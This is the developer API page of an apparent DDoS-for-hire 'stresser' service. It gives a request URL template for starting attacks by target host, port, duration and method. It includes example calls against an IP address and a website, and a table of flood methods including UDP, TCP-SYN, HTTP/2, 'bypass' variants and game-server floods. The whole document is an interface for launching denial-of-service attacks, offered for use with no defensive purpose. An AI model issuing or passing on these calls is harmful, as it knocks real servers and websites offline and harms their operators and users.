Developer API
https://www.stresserfw.xyz/v2/api.php?username=your_username&pass=your_password&type=start&host=target_to_attack&port=target_port&time=attack_duration_seconds&method=attack_method
Example: server attack. https://www.stresserfw.xyz/v2/api.php?username=username&pass=password&type=start&host=49.1.1.1&port=30120&time=30&method=UDP
Example: website attack. https://www.stresserfw.xyz/v2/api.php?username=username&pass=password&type=start&host=https://www.example.com/&port=80&time=30&method=REQ
+username=your_username
+pass=your_password
+type=start
+host=specify the target to attack
+port=specify the target port to attack
+time=specify the attack time in seconds
+method=specify the attack method (Method CODE)
| Method CODE |
Method |
| UDP |
UDP |
| SUDP |
SUDP |
| TCP |
TCP |
| SYN |
TCP-SYN |
| HOME |
HOME |
| HOME2 |
HOME2 |
| UDPRAND |
UDP-RANDOM |
| ICMP |
ICMP |
| STCP |
STCP |
| ROV |
ROV-ROOM |
| FF |
FREEFIRE-ROOM |
| HON |
HON-ROOM |
| FIVEM |
UDP-FIVEM |
| SCUM |
UDP-SCUM |
| BTCP |
TCP-BYPASS |
| BUDP |
UDP-BYPASS |
| HTTP1 |
HTTP/1 |
| HTTP2 |
HTTP/2 |
| BROWSER |
BROWSER |
| REQ |
HTTP-REQ |
| FUDP |
UDP-FREE |
| FTCP |
TCP-FREE |
| FHTTP1 |
HTTP/1-FREE |
| FHTTP2 |
HTTP/2-FREE |
....
....